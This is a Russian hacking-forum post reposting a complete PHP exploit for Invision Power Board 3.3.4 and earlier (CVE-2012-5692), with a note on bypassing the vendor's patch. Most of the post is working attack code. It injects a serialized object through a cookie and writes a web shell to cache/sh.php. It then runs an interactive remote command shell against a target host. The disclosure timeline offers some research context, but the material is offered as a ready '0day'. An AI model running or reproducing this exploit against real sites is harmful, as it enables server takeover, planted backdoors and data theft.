1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Уязвимости IPB (Invision Power Board)

Тема в разделе "Уязвимости популярных CMS", создана пользователем Хулиган, 11 ноя 2012.

  1. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Invision Power Board <= 3.3.4 unserialize Regex Bypass​


    Код:
    <?php
    /*
     
    So this is the patch that sanitizes,
    static public function safeUnserialize( $serialized )
        {
            // unserialize will return false for object declared with small cap o
            // as well as if there is any ws between O and :
            if ( is_string( $serialized ) && strpos( $serialized, "\0" ) === false )
            {
                if ( strpos( $serialized, 'O:' ) === false )
                {
                    // the easy case, nothing to worry about
                    // let unserialize do the job
                    return @unserialize( $serialized );
                }
                else if ( ! preg_match('/(^|;|{|})O:[0-9]+:"/', $serialized ) )
                {
                    // in case we did have a string with O: in it,
                    // but it was not a true serialized object
                    return @unserialize( $serialized );
                }
            }
      
            return false;
        }
         
     
    And this is what bypasses it ( By @i0n1c )
    $payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}');
     
    Which makes this an IPB 0day. lulz!
     
    - webDEViL
     
    */
     
    /*
        ----------------------------------------------------------------
        Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
        ----------------------------------------------------------------
         
        author..............: Egidio Romano aka EgiX
        mail................: n0b0d13s[at]gmail[dot]com
        software link.......: http://www.invisionpower.com/
         
        +-------------------------------------------------------------------------+
        | This proof of concept code was written for educational purpose only.    |
        | Use it at your own risk. Author will be not responsible for any damage. |
        +-------------------------------------------------------------------------+
         
        [-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php
         
        4015.        static public function get($name)
        4016.        {
        4017.            // Check internal data first
        4018.            if ( isset( self::$_cookiesSet[ $name ] ) )
        4019.            {
        4020.                return self::$_cookiesSet[ $name ];
        4021.            }
        4022.            else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) )
        4023.            {
        4024.                $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ];
        4025.   
        4026.                if ( substr( $_value, 0, 2 ) == 'a:' )
        4027.                {
        4028.                    return unserialize( stripslashes( urldecode( $_value ) ) );
        4029.                }
         
        The vulnerability is caused due to this method unserialize user input passed through cookies without a proper
        sanitization. The only one check is done at line 4026,  where is controlled that the serialized string starts
        with 'a:',  but this is not  sufficient to prevent a  "PHP Object Injection"  because an attacker may send  a
        serialized string which represents an array of objects.  This can be  exploited to execute arbitrary PHP code
        via the  "__destruct()" method of the  "dbMain" class,  which calls the "writeDebugLog" method to write debug
        info into a file.  PHP code may  be injected  only through the  $_SERVER['QUERY_STRING']  variable,  for this
        reason successful exploitation of this vulnerability requires short_open_tag to be enabled.
     
        [-] Disclosure timeline:
         
        [21/10/2012] - Vulnerability discovered
        [23/10/2012] - Vendor notified
        [25/10/2012] - Patch released: http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update
        [25/10/2012] - CVE number requested
        [29/10/2012] - Assigned CVE-2012-5692
        [31/10/2012] - Public disclosure
     
    */
     
    error_reporting(0);
    set_time_limit(0);
    ini_set('default_socket_timeout', 5);
     
    function http_send($host, $packet)
    {
        if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
        fputs($sock, $packet);
        return stream_get_contents($sock);
    }
     
    print "\n+-----------------------------------+";
    print "\n| Invision Power Board 0day Exploit |";
    print "\n+-----------------------------------+\n";
     
    if ($argc < 3)
    {
        print "\nUsage......: php $argv[0] <host> <path>\n";
        print "\nExample....: php $argv[0] localhost /";
        print "\nExample....: php $argv[0] localhost /ipb/\n";
        die();
    }
     
    list($host, $path) = array($argv[1], $argv[2]);
     
    $packet  = "GET {$path}index.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
         
    $_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ?  $m[1] : '';
     
    class db_driver_mysql
    {
        public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
    }
    # Super bypass by @i0n1c
    $payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}');
    $phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>';
     
    $packet  = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
    $packet .= "Connection: close\r\n\r\n";
     
    http_send($host, $packet);
     
    $packet  = "GET {$path}cache/sh.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cmd: %s\r\n";
    $packet .= "Connection: close\r\n\r\n";
     
    if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");
     
    while(1)
    {
        print "\nipb-shell# ";
        if (($cmd = trim(fgets(STDIN))) == "exit") break;
        $response = http_send($host, sprintf($packet, base64_encode($cmd)));
        preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
    }
    ?>
    
    (c) exploit-db.com​
     
    11 ноя 2012

Поделиться этой страницей

Загрузка...